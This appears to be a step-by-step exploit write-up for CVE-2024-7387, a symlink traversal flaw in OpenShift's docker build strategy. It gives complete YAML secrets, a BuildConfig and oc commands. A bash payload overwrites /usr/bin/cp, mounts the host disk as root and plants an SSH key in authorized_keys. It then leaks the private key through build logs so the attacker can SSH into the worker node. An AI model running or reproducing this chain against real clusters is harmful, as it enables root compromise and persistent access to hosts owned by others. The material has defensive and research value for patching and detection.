Share
## https://sploitus.com/exploit?id=64C38A18-AE31-5EAB-AF2D-550FD1EAD74F
### overview

[cve-2024-7387](https://nvd.nist.gov/vuln/detail/CVE-2024-7387)  is a symlink traversal vulnerability in openshift's docker build strategy. attackers can mount a secret to a symlink pointing to `/usr/bin`, overwriting system binaries like `cp`. when openshift uses these compromised binaries during builds, it executes arbitrary code with root privileges, enabling full host compromise.

### exploit

clone the repository containing the vulnerable configuration:

```shell
git clone https://github.com/fatcatresearch/cve-2024-7387.git
cd cve-2024-7387
```

the repository contains a `Dockerfile` and a symbolic link `usr_bin` pointing to `/usr/bin`:

```Dockerfile
FROM fedora:latest
COPY . .
RUN ls -la && cat pwn.txt
```

create a secret containing the malicious bash payload named `cp`:

```yaml
# malicious-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: malicious-secret
stringData:
  cp: |
    #!/bin/bash
    {
      mkdir -p /mnt/h                                                                                  
      mount /dev/vda4 /mnt/h 2>&1                                                                 
      ssh-keygen -t ed25519 -f /tmp/exploit_key -N "" -q                                                
      mkdir -p /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh                                  
      cat /tmp/exploit_key.pub >> /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys 
      chmod 600 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys                  
      chown 1000:1000 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys          
      cat /tmp/exploit_key                                                                            
    } > /tmp/build/inputs/pwn.txt 2>&1
    exit 0
type: Opaque
```

apply the secret:

```bash
oc apply -f malicious-secret.yaml
```

>the `cp` key in the secret will create a file named `cp`. when mounted via `destinationDir: usr_bin` (a symlink to `/usr/bin`), this file overwrites the legitimate `/usr/bin/cp` binary with the malicious script.

create a trigger secret:

```yaml
# trigger-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: trigger-secret
stringData:
  trigger: pwned
type: Opaque
```

apply the trigger secret:

```bash
oc apply -f trigger-secret.yaml
```

>the secret will trigger openshift to use the `cp` command internally when mounting it, executing the malicious payload.

create the `BuildConfig` that mounts both secrets:

```yaml
# malicious-buildconfig.yaml
kind: BuildConfig
apiVersion: build.openshift.io/v1
metadata:
  name: malicious-buildconfig
spec:
  nodeSelector: null
  strategy:
    type: Docker
    dockerStrategy:
      dockerfilePath: Dockerfile
  source:
    type: Git
    git:
      uri: 'https://github.com/fatcatresearch/cve-2024-7387.git'
      ref: main
    contextDir: /
    secrets:
      - secret:
          name: malicious-secret  
        destinationDir: usr_bin
      - secret:
          name: trigger-secret  
```

>the `destinationDir: usr_bin` mounts the secret at `/tmp/build/inputs/usr_bin` & since `usr_bin` is a symlink to `/usr/bin`, the secret's `cp` file overwrites `/usr/bin/cp`. the trigger-secret mounts to the build context root, & when openshift copies it using the `cp` command, the malicious `/usr/bin/cp` script executes instead.

apply the build configuration:

```bash
oc apply -f malicious-buildconfig.yaml
```

start the build to execute the payload:

```shell
oc start-build malicious-buildconfig
```

check the build logs to verify the payload executed:

```shell
oc logs -f build/malicious-buildconfig-1
```

>the contents of `pwn.txt` displayed in the build logs confirm the malicious script executed successfully & contain the private SSH key needed for host access.

save the private key from the build logs, set correct permissions, & establish SSH connection to the worker node:

```shell
chmod 600 exploit_key
ssh -i exploit_key core@WORKER_IP
```